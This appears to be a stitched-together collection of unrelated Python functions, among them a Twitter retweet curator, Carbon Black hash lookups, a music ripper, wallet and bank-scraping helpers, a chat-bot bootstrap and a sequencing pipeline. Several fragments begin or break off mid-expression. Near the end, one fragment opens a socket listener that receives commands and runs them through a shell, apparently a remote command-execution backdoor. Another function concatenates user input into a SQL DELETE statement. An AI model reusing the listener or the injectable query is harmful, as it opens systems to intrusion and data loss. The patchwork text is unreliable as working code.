def main(): h = HTMLParser.HTMLParser() oldest_id = long(args.id) if args.id else sys.maxint try: for item in tweepy.Cursor(api.user_timeline).items(2000): if item.id >= oldest_id: print "seen this tweet already" continue if not hasattr(item, 'retweeted_status'): continue username = item.retweeted_status.user.screen_name tweet = h.unescape(item.retweeted_status.text) if 'http://' in tweet: continue if username == 'fanfiction_txt': continue print colored.red('@{}'.format(username)) print colored.blue(tweet) print "Add this tweet?" answer = raw_input() if answer == 'y' or answer == '': add_tweet(username, tweet) except: if 'item' in locals(): print "Current tweet ID is {}".format(item.id) raise
def check_execution(self, md5): parentquery='parent_md5:'+md5 md5query='md5:'+md5 if md5query.endswith(" "): print colored.red("[-] Bit9 did not capture the MD5 :(\n") else: print colored.yellow("[*] Checking if Parent MD5 process in Carbon Black...") parentresult = self.cb.process_search(parentquery, sort='start desc') if parentresult['total_results']==0: print colored.cyan("[+] Not a Parent MD5 process") else: cbparentmd5url=self.parentmd5url+md5+"&sort=&rows=10&start=0" print colored.green("[+] Parent MD5 event found in Carbon Black.") print colored.cyan(cbparentmd5url) print colored.yellow("[*] Checking if MD5 seen in Carbon Black...") md5result = self.cb.process_search(md5query, sort='start desc') if md5result['total_results'] == 0: print colored.cyan("[+] Not seen in Carbon Black.") else: cbmd5url=self.md5url+md5+"&sort=&rows=10&start=0" print colored.green("[+] MD5 Found in CB.") print colored.cyan(cbmd5url) #cb=CB()
def encode(self, session, track): # write ID3 data print "\n" + colored.green(str("Encode:")) success = True for enc in self.get_encoders(): if not enc.run(session, self._meta): print colored.red("Error encoding: %s" %enc.suffix) success = False #try: #puts('Moving %s to %s' % ('temp.mp3', mp3_path)) #except UnicodeEncodeError: #sys.stdout.write(' # Moving %s to %s\n' \ #% ('temp.mp3', mp3_path)) ## move mp3 to final directory if not success: print colored.red("Error processing file. Keep raw file") return os.unlink(self._meta["out_path"] + ".raw") if os.path.exists("cover.jpg"): os.unlink("cover.jpg") # delete cover #if not self._json_queue.is_starred_track(): #self._util.shell("rm -f cover.jpg") self._json_queue.mark_as_downloaded(Link.from_track(track))
def display_available_branches(): """Displays available branches.""" branches = get_branches() if not branches: print colored.red('No branches available') return branch_col = len(max([b.name for b in branches], key=len)) + 1 for branch in branches: try: branch_is_selected = (branch.name == repo.head.ref.name) except TypeError: branch_is_selected = False marker = '*' if branch_is_selected else ' ' color = colored.green if branch_is_selected else colored.yellow pub = '(published)' if branch.is_published else '(unpublished)' print columns( [colored.red(marker), 2], [color(branch.name), branch_col], [black(pub), 14] )
def create_repository(project_name, description, organization=None): if not have_credentials(): puts('{0}. {1}'.format(colored.blue('octogit'), colored.red('in order to create a repository, you need to login.'))) sys.exit(1) if local_already(project_name): sys.exit(1) post_dict = {'name': project_name, 'description': description, 'homepage': '', 'private': False, 'has_issues': True, 'has_wiki': True, 'has_downloads': True} if organization: post_url = 'https://api.github.com/orgs/{0}/repos'.format(organization) else: post_url = 'https://api.github.com/user/repos' r = requests.post(post_url, headers=get_headers(), data=json.dumps(post_dict)) if r.status_code == 201: if organization: create_local_repo(organization, project_name) else: create_local_repo(get_username(), project_name) else: # Something went wrong post_response = json.loads(r.content) errors = post_response.get('errors') if errors and errors[0]['message'] == 'name already exists on this account': puts('{0}. {1}'.format(colored.blue('octogit'), colored.red('repository named this already exists on github'))) else: puts('{0}. {1}'.format(colored.blue('octogit'), colored.red('something went wrong. perhaps you need to login?'))) sys.exit(-1)
def get_block_js(func, **modifiers): """Возвращает js для блока с заданными модификаторами. """ from importlib import import_module import os.path mo = import_module(func.__module__) dir_name = os.path.dirname(mo.__file__) main_js_filename = os.path.join( dir_name, 'js', get_block_name(func) + '.js') js_filename_with_modifiers = os.path.join( dir_name, 'js', get_blockname_with_modifiers(func, **modifiers) + '.js') result = u'' print 'checking', main_js_filename, if os.path.exists(main_js_filename): print colored.green('found') with open(main_js_filename) as f: result += f.read().decode('utf-8') + u'\n' else: print colored.red('missing') if js_filename_with_modifiers != main_js_filename: print 'checking', js_filename_with_modifiers, if os.path.exists(js_filename_with_modifiers): print colored.green('found') with open(js_filename_with_modifiers) as f: result += f.read().decode('utf-8') + u'\n' else: print colored.red('missing') return result
def rip(self, session, # the current session frames, # the audio data frame_size, # bytes per frame num_frames, # number of frames in this delivery sample_type, # currently this is always 0, which means 16-bit # signed native endian integer samples sample_rate, # audio sample rate, in samples per second channels): # number of audio channels, currently 1 or 2 self._downloaded += float(frame_size) * float(num_frames) if self._ripping: # 320 kilobits per second # 40 kilobytes per second # duration in milliseconds # 40 bytes per millisecond if not self._pipe: self.end_of_track(session) return total_bytes = float(self._duration) * 40.0 # 100 = 4.41 (don't ask me why) progress_perc = self._downloaded / total_bytes progress_perc = progress_perc * (100.0 / 4.41) progress.bar(range(100)) sys.stdout.write('\r > Progress: %.2f%%' % progress_perc) try: self._pipe.write(frames); except IOError as e: print colored.red("ERROR: %s" %e) os.kill(os.getpid(), 9)
def printFinalResult(self, output, passed, numberOfTests): # Given test cases dont exist if numberOfTests == 0 and len(self.testCases) > 0: puts(colored.red("Given test cases " + str(self.testCases) + " don't exist for problem with id " + str( self.problemId) + "!")) sys.exit(1) # No tests found elif numberOfTests == 0: puts(colored.red("No test cases found for problem with id " + str(self.problemId) + "!")) sys.exit(1) # Log was created and LOG=True(-more is used) if self.logFileBool and self.showInfo: puts(colored.yellow("Check log file \"cae_log\" in your working directory for more detailed info!")) # All tests passed if passed >= numberOfTests: puts(colored.green("\nAll (" + str(numberOfTests) + ") test/s passed! Well done!")) # All tests failed elif passed <= 0: puts(colored.red("\nAll (" + str(numberOfTests) + ") test/s failed! Try again!")) # Some test failed else: puts("\nNumber of tests passed: " + str(passed) + "/" + str(len(output['testCases']))) puts(colored.yellow("Some tests failed! Almost there, keep trying!"))
def checkToken(self, tokenInput): response = requests.post(self.pathAssociateToken + tokenInput) # Check if status not 200 if response.status_code != requests.codes.ok: puts(colored.red("Bad request!2")) sys.exit(1) data = response.json() # Check if wrong token if 'errorMessage' in data.keys(): puts(colored.red("Invalid token!")) sys.exit(1) # Modify encoding of account info self.modifyEncoding(data) # Token is ok if data['success'] and self.showInfo: puts(colored.green("Token is valid!\n")) formatNum = len(data['email'].decode('utf8')) + 8 puts(" " * (formatNum / 3) + colored.yellow("Account info")) nameLen = len(data['name'].decode('utf8')) + 8 puts("|" + "=" * formatNum + "|") # puts(colored.yellow("\tAccount info")) puts("| " + colored.yellow("Name: ") + " " + data['name'] + " " * ( formatNum - nameLen) + "|\n| " + colored.yellow( "Email: ") + data['email'] + "|") puts("|" + "=" * formatNum + "|") puts() return True
def Run(report): print colored.yellow("[*] Creating time table.") timelist=[] timetable={} for item in report['process'].get('filemod_complete', []): timelist.append(item.split("|")[1][:-4]) try: for item in report['process'].get('regmod_complete', []): timelist.append(item.split("|")[1][:-4]) except: print colored.red("[-] No registry modifications made.") pass try: for item in report['process'].get('netconn_complete', []): timelist.append(item.split("|")[0][:-4]) except: print colored.red("[-] No network connections found in process report.") pass for item in report['process'].get('modload_complete', []): timelist.append(item.split("|")[0][:-4]) timelist=sorted(set(timelist)) for time in timelist: #print datetime.strptime(time, '%Y-%m-%d %H:%M:%S') timetable[time]=[] print colored.green("[+] Completed.\n") return timetable,timelist
def __format_file(file_gist): """ Formats the output for a GistFile object. :param gist: :class: `GistFile <GistFile>` instance. """ # Calculate the number of columns of the current terminal window rows, columns = os.popen('stty size', 'r').read().split() # Prepare the Header gist_string = colored.cyan('-' * int(columns)) + "\n" gist_string += colored.cyan("File [" + file_gist.filename + "]\n") gist_string += colored.cyan('-' * int(columns)) + "\n" # Format Gist data gist_string += (colored.green("Language:") + " " + colored.red(file_gist.language) + "\n") gist_string += (colored.green("Size:") + " " + colored.red(file_gist.size) + "\n") gist_string += (colored.green("Raw Url:") + " " + colored.red(file_gist.raw_url + "\n")) gist_string += (colored.green("Content:\n\n") + file_gist.content + "\n\n") # Prepare the Footer gist_string += colored.cyan('-' * int(columns)) + "\n" return gist_string
def notification(flag) : """notifications tell us what going on behind the scene""" if flag == 1 : puts(colored.red("error : wrong value entered! input correct value.")) space() flag = 0 elif flag == 2 : puts(colored.yellow("success : username successfully added to data file.")) space() flag = 0 elif flag == 3 : puts(colored.red("error : invalid username entered.")) space() flag = 0 elif flag == 4 : puts(colored.red("error : username already present.")) space() flag = 0 elif flag == 5 : puts(colored.red("error : username not present in list.")) space() flag = 0 elif flag == 6 : puts(colored.yellow("success : username deleted successfully.")) space() flag = 0
def download_jfsfile(remote_object, tofolder=None, checksum=False): 'Helper function to get a jfsfile and store it in a local folder, optionally checksumming it. Returns boolean' if tofolder is None: tofolder = '.' # with no arguments, store in current dir total_size = remote_object.size if remote_object.state in (JFS.ProtoFile.STATE_CORRUPT, JFS.ProtoFile.STATE_INCOMPLETE): puts(colored.red('%s was NOT downloaded successfully - Incomplete file' % remote_file.name)) return False topath = os.path.join(tofolder, remote_object.name) with open(topath, 'wb') as fh: bytes_read = 0 puts(colored.white('Downloading: %s, size: %s \t' % (remote_object.name, print_size(total_size, humanize=True)))) with ProgressBar(expected_size=total_size) as bar: for chunk_num, chunk in enumerate(remote_object.stream()): fh.write(chunk) bytes_read += len(chunk) bar.show(bytes_read) if checksum: md5_lf = JFS.calculate_md5(open(topath, 'rb')) md5_jf = remote_object.md5 logging.info('%s - Checksum for downloaded file' % md5_lf) logging.info('%s - Checksum for server file' % md5_jf) if md5_lf != md5_jf: puts(colored.blue('%s - Checksum for downloaded file' % md5_lf)) puts(colored.blue('%s - Checksum for server file' % md5_jf)) puts(colored.red('%s was NOT downloaded successfully - cheksum mismatch' % remote_object.name)) return False puts(colored.green('%s was downloaded successfully - checksum matched' % remote_object.name)) return True
def Build(): try: year = int(sys.argv[4]) month = int(sys.argv[5]) day = int(sys.argv[6]) timestamp = datetime(year, month, day) except IndexError: print colored.red("Date missing: python main.py build yyyy mm dd") print colored.yellow("Asumming current date:") timestamp = datetime.today() print "BUILDING Database and content" # Generate Users #user_generator = UserGenerator() #user_generator.run() # Generate Places #place_generator = PlaceGenerator() #place_generator.run() # Generate Friendships #fs_generator = FriendshipGenerator() #fs_generator.run() # Generate Topics #tp_generator = TopicGenerator(amount=1000) #tp_generator.run() # Generate Circuits #circuit_generator = CircuitGenerator() #circuit_generator.run() # Generate places per circuit #pl_ct_generator = Place_circuit_generator() #pl_ct_generator.run() # Generate topics per circuit #tc_ct_generator = Topic_circuit_generator() #tc_ct_generator.run() # Generate explicit_interests #exp_generator = ExplicitGenerator(date=timestamp) #exp_generator.run() # Generate Visits #visit_generator = VisitGenerator(date=timestamp) #visit_generator.run(min_equiv=360) # 360 mins = 6 hours # Generate topic follows #follow_generator = FollowGenerator(date=timestamp) #follow_generator.run() # Generate Ratings #rating_generator = RatingsGenerator() #rating_generator.run() # Generate category follow #category_follow = CategoryFollowGenerator() #category_follow.run() # Generate Place.done pc_done = PlaceDoneGenerator() pc_done.run()
def addflow(self): print("\tThis is Dynamic Addflow, so to avoid write long lines in the \n" + "\tcommand line. Add a new todo: \n\n") try: task = input("Whats the thing! (req): ").strip() if task in ['', ' ']: raise ValueError except ValueError as e: raise ValueError(colored.red("Task cannot be left Empty")) try: bounty = int(input("How much is the reward (integer):(" + str(1) + ") ") or 1) except ValueError as e: raise ValueError(colored.red("Bounty should be an integer")) try: due = input("When its' due? (YYYY-MM-DD HH:mm)/ +(due_rules): ").strip() due_datetime = None if (due): due_datetime = parse_duestring(due) except ValueError as e: raise ValueError(colored.red("Bad Date Fomat: Expected Formats (YYYY-MM-DD or due_rules)")) tags = input("Tags (comma seprated): ").strip().split(',') tags = clean_tags(tags) foldername = input("Folder/Project :" ).strip() foldername = clean_foldername(foldername) self._todos.add(task, bounty, due_datetime, tags, foldername)
def oort(oortpath, jnius): GZIPOutputStream = jnius.autoclass("java.util.zip.GZIPOutputStream") ObjectOutputStream = jnius.autoclass("java.io.ObjectOutputStream") File = jnius.autoclass("java.io.File") FileOutputStream = jnius.autoclass("java.io.FileOutputStream") from pylire.process.bitsampling import BITS from pylire.process.bitsampling import NUM_BITS, NUM_DIMENSIONS, NUM_FUNCTION_BUNDLES puts(colored.cyan("Writing HDF5 data to ObjectOutputStream...")) if isfile(oortpath): unlink(oortpath) oortcloud = ObjectOutputStream(GZIPOutputStream(FileOutputStream(File(oortpath)))) oortcloud.writeInt(NUM_BITS) oortcloud.writeInt(NUM_DIMENSIONS) oortcloud.writeInt(NUM_FUNCTION_BUNDLES) with indent(3, quote="+ "): puts(colored.red("(int) NUM_BITS: %d" % NUM_BITS)) puts(colored.red("(int) NUM_DIMENSIONS: %d" % NUM_DIMENSIONS)) puts(colored.red("(int) NUM_FUNCTION_BUNDLES: %d" % NUM_FUNCTION_BUNDLES)) for floatval in progress.bar(BITS.flatten(), label=colored.red(" (float) BITS")): oortcloud.writeFloat(floatval) oortcloud.flush() oortcloud.close()
def run(): try: option = sys.argv[3].upper() except IndexError: print colored.red("Argument missing: python main.py delete|build yyyy mm dd|simulate ndays|rebuild yyyy mm dd") exit(0) if option == 'DELETE': #Delete() exit(0) if option == 'BUILD': Build() exit(0) if option == 'SIMULATE': #Simulate() exit(0) if option == 'REBUILD': """ DETELE + BUILD """ #Delete() #Build() exit(0) else: print "Not an option: python main.py build|delete|simulate" exit(0)
def generate_offline_tx(wallet_obj): if not USER_ONLINE: puts(colored.red('BlockCypher connection needed to fetch unspents for signing.')) return # TODO: implement puts(colored.red('Feature Coming Soon'))
def broadcast_signed_tx(wallet_obj): if not USER_ONLINE: puts(colored.red('BlockCypher connection needed to broadcast signed transaction.')) return # TODO: implement puts(colored.red('Feature Coming Soon'))
def processManifest(args): manifestPath = os.path.join(args.baseDir, "sprites.mf") if not os.path.exists(manifestPath): raise Usage("Manifest not found at %s." % (red(manifestPath, bold=True)), (manifestPath,)) lineCount = len(open(manifestPath).readlines()) manifest = csv.DictReader(open(manifestPath), skipinitialspace=True) manifest.fieldnames = ["filename", "spritesheet"] spritesheets = {} for line in progress.bar(manifest, label="Reading Manifest: ", expected_size=lineCount): sheet = line["spritesheet"] image = line["filename"] imagePath = os.path.join(args.baseDir, image) if not os.path.exists(imagePath): raise Usage( "Image not found at %s from %s, %s." % ( red(imagePath, bold=True), blue(manifestPath, bold=True), blue("line " + str(manifest.line_num), bold=True), ), (imagePath, manifestPath, manifest.line_num), ) spritesheets.setdefault(sheet, Spritesheet(sheet)).addImage(image) return spritesheets.values()
def display_recent_txs(wallet_obj): if not USER_ONLINE: puts(colored.red('BlockCypher connection needed to find transactions related to your addresses.')) puts(colored.red('You may dump all your addresses while offline by selecting option 0.')) return local_tz = get_localzone() # Show overall balance info display_balance_info(wallet_obj=wallet_obj) mpub = wallet_obj.serialize_b58(private=False) wallet_name = get_blockcypher_walletname_from_mpub( mpub=mpub, subchain_indices=[0, 1], ) wallet_details = get_wallet_transactions( wallet_name=wallet_name, api_key=BLOCKCYPHER_API_KEY, coin_symbol=coin_symbol_from_mkey(mpub), ) verbose_print(wallet_details) # TODO: pagination for lots of transactions txs = wallet_details.get('unconfirmed_txrefs', []) + wallet_details.get('txrefs', []) if txs: for tx_object in flatten_txns_by_hash(txs, nesting=False): if tx_object.get('confirmed_at'): tx_time = tx_object['confirmed_at'] else: tx_time = tx_object['received_at'] net_satoshis_tx = sum(tx_object['txns_satoshis_list']) conf_str = '' if tx_object.get('confirmed_at'): if tx_object.get('confirmations'): if tx_object.get('confirmations') <= 6: conf_str = ' (%s confirmations)' % tx_object.get('confirmations') else: conf_str = ' (6+ confirmations)' else: conf_str = ' (0 confirmations!)' puts(colored.green('%s: %s%s %s in TX hash %s%s' % ( tx_time.astimezone(local_tz).strftime("%Y-%m-%d %H:%M %Z"), '+' if net_satoshis_tx > 0 else '', format_crypto_units( input_quantity=net_satoshis_tx, input_type='satoshi', output_type=UNIT_CHOICE, coin_symbol=coin_symbol_from_mkey(mpub), print_cs=True, ), 'received' if net_satoshis_tx > 0 else 'sent', tx_object['tx_hash'], conf_str, ))) else: puts('No Transactions')
def main(self, target): minions = self.parent.client.cmd(target, 'test.ping') if len(minions) == 0: puts(colored.red("No up minions matching, abort!")) sys.exit(1) for minion in minions: puts(colored.blue("=" * 10)) puts(colored.blue("Minion: %s" % minion)) puts(colored.blue("Starting healthchecks on %s" % minion)) health_checks_result = self.parent.client.cmd(minion, 'state.top', 9999999999, 'healthcheck_top.sls')[minion] x = _format_host(minion, health_checks_result) print x[0] success = parse_result(health_checks_result) if not success: puts() puts(colored.red("Healthchecks has failed on minion %s" % minion)) else: puts() puts(colored.green("Healthchecks success on minion %s" % minion))
def subdown(args): def coerce_or_die(args, arg, f=int): try: try: val = f(args[arg]) if val < 0: raise Exception('{} must be positive.'.format(arg)) return val except ValueError: raise Exception('{} must be coercable to {}.'.format(arg, f)) except Exception as e: puts(colored.red(str(e))) sys.exit(1) timeout = coerce_or_die(args, '--timeout', f=float) page_timeout = coerce_or_die(args, '--page-timeout', f=float) max_count = coerce_or_die(args, '--pages') subreddits = args['<subreddit>'] for subreddit in subreddits: try: subreddit = fix_subreddit_name(subreddit) except: puts(colored.red('Failed to load subreddit {}'.format(subreddit))) continue try: get_subreddit(subreddit, max_count, timeout, page_timeout) except Exception as e: raise puts(colored.red(str(e)))
def list_existing_accounts(): col = 20 all_accounts = account_store.get_all_accounts() if len(all_accounts) == 0: puts(colored.red("There is no linked account yet.")) return puts(colored.green("You have linked the following account(s) to onedrive-d:\n")) puts( columns( [(colored.red("Index")), 10], [(colored.magenta("Account ID")), col], [(colored.cyan("Account Type")), col], [(colored.green("Name")), None], ) ) account_list = [] for id, account in all_accounts.items(): puts( columns( [str(len(account_list)), 10], [account.profile.user_id, col], [account.TYPE, col], [account.profile.name, None], ) ) account_list.append(account) puts(colored.yellow("\nTo delete an account, type the index and hit [Enter]. Otherwise hit [Ctrl+C] to break.")) puts(colored.yellow("Note: all the Drives belonging to the account will also be deleted.")) puts() try: prompt_delete_account(account_list) except KeyboardInterrupt: puts(colored.green("Aborted."))
def main(): # take care of the new user trying to figure wtf is going on here if not args or args.get(0) == 'help' and len(args) == 1: usage() exit(0) try: center = CommandCenter(DEFAULT_BLT_FILE) except IOError as e: print red('[ERROR]') + ' %s' % e exit(1) # figure out our environment envtype = determine_envtype() # user is requesting help on a specific command if args.get(0) == 'help': # call the commandcenter help method, we skip past index 0 which # is just the "help" arg. center.help(args[1:]) exit(0) # check if the user is requesting a list: if args.get(0) == 'list': center.list(args[1:]) elif args.get(0) == 'completion': print '\n'.join(sorted(center.commands.keys())) else: cmd = args.pop(0) try: center.run(envtype, cmd, args.all) except KeyboardInterrupt: print '\nCancelled.'
def unallocate(docopt_args): """Unallocates a staff his/her given room""" personnel_name = "" name_of_room = "" if docopt_args["-p"] and docopt_args["-r"]: personnel_name = docopt_args["<fname>"] + " " + docopt_args["<lname>"] name_of_room = docopt_args["<name_of_room>"] db = DatabaseManager("Amity.sqlite") # query db to find the apecific allocation cursor = db.query("DELETE from Allocations where Personnel_Name = '" + personnel_name + "' and Room_name = '" + name_of_room + "'") if cursor.rowcount > 0: puts(colored.green( personnel_name + " has been unnallocated room " + name_of_room + " successfully!")) # update to cache f = open("cache", 'r') filedata = f.read() f.close() newdata = filedata.replace( "('" + name_of_room + "', '" + personnel_name + "')", "") f = open("cache", 'w+') f.write(newdata) f.close() else: puts(colored.red("The allocation does not exist")) else: puts(colored.red("You failed to supply peronnel name and room name"))
def add_personal_account(): puts(colored.green("Link with an OneDrive Personal account:")) puts( colored.cyan( "Please use your browser to visit the following URL, sign in with your OneDrive account and " "authorize onedrive-d, then copy the callback URL back here. The callback URL is the URL at " "which the authorization page goes blank and usually starts with " + clients.PersonalClient.DEFAULT_REDIRECT_URI + "." ) ) puts() puts(colored.yellow("Please visit this URL: ")) puts(personal_client.get_auth_uri()) while True: try: url = prompt.query(str(colored.yellow("\nPlease paste the callback URL or hit [Ctrl+C] to abort:"))) account = accounts.get_personal_account(personal_client, uri=url) profile = account.profile account_store.add_account(account) puts(colored.green("Success: added account {} ({}).".format(profile.user_id, profile.name))) return except KeyboardInterrupt: puts(colored.red("Aborted.")) return except Exception as ex: puts(colored.red("Error: " + str(ex)))
def test_regex(self, line): '''Test a regex to see how many actions match. ''' try: rgx = re.compile(line) except sre_constants.error as e: msg = red('Bad regex: ') + green(repr(line)) + ' You have failed the bat-test.' puts(msg) print e return self.current_rgx = rgx puts('Testing ' + colored.green(line)) matched = [] for action in self.actions.unmatched: m = re.search(line, action) if m: matched.append([action, m.groupdict()]) if not matched: with indent(4, quote=' >'): puts(red('Aw, snap!') + ' ' + cyan('No matches found!')) return self.current_rgx = line self.show_matches_start = 0 with indent(4, quote=' >'): puts('Found ' + colored.red(len(matched)) + ' matches:') self._print_matches(matched[:self.show]) self.matched = matched
def main(args=None): parser = setup_parser() opts = parser.parse_args(args=args) rc = 0 try: opts.func(opts) except InsufficientPermissionsError as e: puts_err(colored.red("\nInsufficient permissions error:\n") + str(e) + "\n") rc = 1 except BlockadeError as e: puts_err(colored.red("\nError:\n") + str(e) + "\n") rc = 1 except KeyboardInterrupt: puts_err(colored.red("Caught Ctrl-C. exiting!")) except: puts_err( colored.red("\nUnexpected error! This may be a Blockade bug.\n")) traceback.print_exc() rc = 2 sys.exit(rc)
def capitalone(user=None, quit_when_finished=True, browser=None): if not user: # Get the username from the command line arguments. user = args.get(0) # Must supply username. if user is None: puts(colored.red('You must supply a username like "python capitalone.py nick"')) sys.exit() # Get the user's password from the password backend. key = keyring.get_password('capitalone.com', user) # If the key doesn't exist in the password backend. if key is None: puts(colored.red("You must store the password for {} in your keyring's backend.".format(user))) puts('See: http://pypi.python.org/pypi/keyring/#configure-your-keyring-lib') sys.exit() # Log what we're currently working on. puts(colored.blue('\nCapital One ({})'.format(user))) if not browser: # Init the WebDriver. b = webdriver.Firefox() else: b = browser b.get('https://www.capitalone.com/') # Only credit card accounts are supported at this time. account_type = b.find_element_by_css_selector('option[value="credit cards"]') account_type.click() # Find the username field on the page. username = b.find_element_by_css_selector('input#eos-userid') username.send_keys(user) # Find the password field on the page. password = b.find_element_by_css_selector('input#eos-password') password.send_keys(key) password.submit() # Wait for an account list. try: WebDriverWait(b, timeout=10).until(_element_available(b, 'table.dataTable')) except TimeoutException: puts(colored.red("Couldn't find any accounts for that username.")) b.quit() sys.exit() amount = b.find_element_by_css_selector('table.dataTable tr.itemSummary td:nth-child(4) p') print 'Capital One ({}): {}'.format(user, amount.text) if quit_when_finished: b.quit() return b
def post_fb(api, content, attachment): try: api.put_wall_post(message=content, attachment=attachment) except Exception as err: print(colored.red(err))
def verify_io(self): puts("Verifying IO backends...") missing_settings = False missing_setting_error_messages = [] one_valid_backend = False self.valid_io_backends = [] if not hasattr(settings, "IO_BACKENDS"): settings.IO_BACKENDS = ["will.backends.io_adapters.shell", ] # Try to import them all, catch errors and output trouble if we hit it. for b in settings.IO_BACKENDS: with indent(2): try: path_name = None for mod in b.split('.'): if path_name is not None: path_name = [path_name] file_name, path_name, description = imp.find_module(mod, path_name) # show_valid("%s" % b) module = import_module(b) for class_name, cls in inspect.getmembers(module, predicate=inspect.isclass): if ( hasattr(cls, "is_will_iobackend") and cls.is_will_iobackend and class_name != "IOBackend" and class_name != "StdInOutIOBackend" ): c = cls() show_valid(c.friendly_name) c.verify_settings() one_valid_backend = True self.valid_io_backends.append(b) except EnvironmentError as e: puts(colored.red(" ✗ %s is missing settings, and will be disabled." % b)) puts() missing_settings = True except Exception as e: error_message = ( "IO backend %s is missing. Please either remove it \nfrom config.py " "or WILL_IO_BACKENDS, or provide it somehow (pip install, etc)." ) % b puts(colored.red("✗ %s" % b)) puts() puts(error_message) puts() puts(traceback.format_exc()) missing_setting_error_messages.append(error_message) missing_settings = True if missing_settings and not one_valid_backend: puts("") error( "Unable to find a valid IO backend - will has no way to talk " "or listen!\n Quitting now, please look at the above errors!\n" ) self.handle_sys_exit() return False puts() return True
def bootstrap(self): print_head() self.load_config() self.bootstrap_storage_mixin() self.bootstrap_pubsub_mixin() self.bootstrap_plugins() self.verify_plugin_settings() started = self.verify_io() if started: puts("Bootstrapping complete.") # Save help modules. self.save("help_modules", self.help_modules) puts("\nStarting core processes:") # try: # Exit handlers. # signal.signal(signal.SIGINT, self.handle_sys_exit) # # TODO this hangs for some reason. # signal.signal(signal.SIGTERM, self.handle_sys_exit) # Scheduler self.scheduler_thread = Process(target=self.bootstrap_scheduler) # Bottle self.bottle_thread = Process(target=self.bootstrap_bottle) # Event handler self.incoming_event_thread = Process(target=self.bootstrap_event_handler) self.io_threads = [] self.analysis_threads = [] self.generation_threads = [] with indent(2): try: # Start up threads. self.bootstrap_io() self.bootstrap_analysis() self.bootstrap_generation() self.bootstrap_execution() self.scheduler_thread.start() self.bottle_thread.start() self.incoming_event_thread.start() errors = self.get_startup_errors() if len(errors) > 0: error_message = "FYI, I ran into some problems while starting up:" for err in errors: error_message += "\n%s\n" % err puts(colored.red(error_message)) self.stdin_listener_thread = False if self.has_stdin_io_backend: self.current_line = "" while True: for line in sys.stdin.readline(): if "\n" in line: self.publish( "message.incoming.stdin", Event( type="message.incoming.stdin", content=self.current_line, ) ) self.current_line = "" else: self.current_line += line self.sleep_for_event_loop(2) else: while True: time.sleep(100) except (KeyboardInterrupt, SystemExit): self.handle_sys_exit()
" " * 31) + "#" + colored.yellow( " |_| |_____)____/ ") + " #" print colored.yellow("<-->" + " " * 51) + "#" + " " * 21 + "#" + "\n" + "=" * 79 print "# || " + " address " + " " * 10 + "|| cType " + " " * 12 + "|| stat " print "-" * 79 if newStart == True: return bindsocket else: pass try: bindsocket = Welcome(True) except socket.error, (value, message): print colored.red("Could not open socket: " + message + "!!") sys.exit(1) def RecvData(connstream): temp = connstream.read() outData = "" while temp != "CEND": outData += temp temp = connstream.read() return outData def ExecIN(cmd): p = Popen(cmd, shell=True,
def run(parser, args): log = "%s.minion.log.txt" % (args.sample) logfh = open(log, 'w') if args.scheme.find('/') != -1: scheme_name, scheme_version = args.scheme.split('/') else: scheme_name = args.scheme scheme_version = "V1" ref = "%s/%s/%s/%s.reference.fasta" % (args.scheme_directory, scheme_name, scheme_version, scheme_name) bed = "%s/%s/%s/%s.scheme.bed" % (args.scheme_directory, scheme_name, scheme_version, scheme_name) if args.read_file: read_file = args.read_file else: read_file = "%s.fasta" % (args.sample) if not os.path.exists(ref): print(colored.red('Scheme reference file not found: ') + ref) raise SystemExit(1) if not os.path.exists(bed): print(colored.red('Scheme BED file not found: ') + bed) raise SystemExit(1) pools = set([row['PoolName'] for row in read_bed_file(bed)]) cmds = [] nanopolish_header = get_nanopolish_header(ref) if not args.medaka and not args.skip_nanopolish: if not args.fast5_directory or not args.sequencing_summary: print( colored.red( 'Must specify FAST5 directory and sequencing summary for nanopolish mode.' )) raise SystemExit(1) cmds.append("nanopolish index -s %s -d %s %s" % ( args.sequencing_summary, args.fast5_directory, args.read_file, )) # 3) index the ref & align with bwa" if not args.bwa: cmds.append( "minimap2 -a -x map-ont -t %s %s %s | samtools view -bS -F 4 - | samtools sort -o %s.sorted.bam -" % (args.threads, ref, read_file, args.sample)) else: cmds.append("bwa index %s" % (ref, )) cmds.append( "bwa mem -t %s -x ont2d %s %s | samtools view -bS -F 4 - | samtools sort -o %s.sorted.bam -" % (args.threads, ref, read_file, args.sample)) cmds.append("samtools index %s.sorted.bam" % (args.sample, )) # 4) trim the alignments to the primer start sites and normalise the coverage to save time if args.normalise: normalise_string = '--normalise %d' % (args.normalise) else: normalise_string = '' # if args.medaka: # cmds.append("align_trim --no-read-groups --start %s %s --report %s.alignreport.txt < %s.sorted.bam 2> %s.alignreport.er | samtools sort -T %s - -o %s.trimmed.sorted.bam" % (normalise_string, bed, args.sample, args.sample, args.sample, args.sample, args.sample)) # cmds.append("align_trim %s %s --no-read-groups --report %s.alignreport.txt < %s.sorted.bam 2> %s.alignreport.er | samtools sort -T %s - -o %s.primertrimmed.sorted.bam" % (normalise_string, bed, args.sample, args.sample, args.sample, args.sample, args.sample)) # cmds.append("samtools index %s.trimmed.sorted.bam" % (args.sample)) # cmds.append("samtools index %s.primertrimmed.sorted.bam" % (args.sample)) # else: cmds.append( "align_trim --start %s %s --report %s.alignreport.txt < %s.sorted.bam 2> %s.alignreport.er | samtools sort -T %s - -o %s.trimmed.rg.sorted.bam" % (normalise_string, bed, args.sample, args.sample, args.sample, args.sample, args.sample)) cmds.append( "align_trim %s %s --remove-incorrect-pairs --report %s.alignreport.txt < %s.sorted.bam 2> %s.alignreport.er | samtools sort -T %s - -o %s.primertrimmed.rg.sorted.bam" % (normalise_string, bed, args.sample, args.sample, args.sample, args.sample, args.sample)) cmds.append("samtools index %s.trimmed.rg.sorted.bam" % (args.sample)) cmds.append("samtools index %s.primertrimmed.rg.sorted.bam" % (args.sample)) if args.medaka: for p in pools: cmds.append( "samtools view -b -r \"%s\" %s.primertrimmed.rg.sorted.bam > %s.primertrimmed.%s.sorted.bam" % (p, args.sample, args.sample, p)) cmds.append("samtools index %s.primertrimmed.%s.sorted.bam" % (args.sample, p)) # 6) do variant calling using the raw signal alignment if args.medaka: for p in pools: if os.path.exists("%s.%s.hdf" % (args.sample, p)): os.remove("%s.%s.hdf" % (args.sample, p)) cmds.append( "medaka consensus --chunk_len 800 --chunk_ovlp 400 %s.primertrimmed.%s.sorted.bam %s.%s.hdf" % (args.sample, p, args.sample, p)) if args.no_indels: cmds.append("medaka snp %s %s.%s.hdf %s.%s.vcf" % (ref, args.sample, p, args.sample, p)) else: cmds.append("medaka variant %s %s.%s.hdf %s.%s.vcf" % (ref, args.sample, p, args.sample, p)) else: if not args.skip_nanopolish: indexed_nanopolish_file = read_file if args.no_indels: nanopolish_extra_args = " --snps" else: nanopolish_extra_args = "" for p in pools: 